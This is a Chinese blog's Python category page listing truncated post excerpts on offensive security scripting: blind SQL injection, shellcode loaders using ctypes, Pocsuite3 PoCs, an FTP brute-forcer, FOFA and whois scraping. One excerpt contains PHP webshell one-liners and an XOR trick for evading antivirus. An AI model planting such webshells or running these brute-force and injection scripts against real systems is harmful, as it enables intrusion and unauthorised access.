随笔分类 - python
摘要:#conding:utf-8 import requests import sys #加载字典文件 #使用with .. as ..会自动关闭文件流;使用f = open(“filename.txt”,”r”) 需要close关闭文件流。 #每次读取1行 f.readline() #一次读取完 f.
阅读全文
摘要:#布尔(先获取长度后获取名字) import requests,string url = "http://test.com" #计算页面字节长度 htmllen = len(requests.get(url=url+"?id=1").test) print("htmllen:"+str(htmlle
阅读全文
posted @ 2021-10-13 00:23
bingtanghulu
摘要:#豆瓣电影 re爬虫import requests,re,csv url = "https://movie.douban.com/top250" headers={ "User-Agent":"Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:92.0
阅读全文
摘要:https://forum.90sec.com/t/topic/1587 分析shellcode 将shellcode生成后,使用base64编码,放入buf。将代码写入内存,所以需要将代码解码并转为字节类型。在64位系统上运行,必须使用restype函数设置VirtualAlloc返回类型为cty
阅读全文
摘要:https://blog.csdn.net/qq_32261191/article/details/108994177 分析shellcode ctypes是 Python 的外部函数库。它提供了与 C 兼容的数据类型,并允许调用 DLL 或共享库中的函数。可使用该模块以纯 Python 形式对这些
阅读全文
摘要:github地址:https://github.com/knownsec/Pocsuite3 首先确定pocsuit的命令执行方式 verify模式为漏洞检测模式 attack模式为向目标发起有效的攻击 首先找到一个poc 进行分析源码 复制其源码,再原有的基础框架进行修改,首先修改检测模块 这里举
阅读全文
摘要:import requests,base64,time,sys,threading,queue #异或免杀 #<?php $a=("!"^"@").'ssert';$a($_POST['hacker']);?> #<?php @eval($_POST['hacker']);?> #!和@ 先各种转为
阅读全文
摘要:import sys,ftplib import threading,queue def ftp_brute(ip,port): ftp = ftplib.FTP() ftp.connect(ip,int(port)) while not q.empty():#判断q不为空 dict=q.get()
阅读全文
摘要:import socket, os, time, sys, whois # ip查询 def ip_check(url): ip = socket.gethostbyname(url) print(ip) # whois查询 def whois_check(url): data = whois.wh
阅读全文
摘要:import requests, time from lxml import etree def src_tiqu(yeshu): for i in range(1,int(yeshu)+1): try: url = 'https://src.sjtu.edu.cn/list/?i=' + str(
阅读全文
摘要:import requests,base64,time,sys from lxml import etree # fofa网址获取 # 例如:https://fofa.so/result?qbase64 &page=3 def fofa_search(search_data,page): #sear
阅读全文
浙公网安备 33010602011771号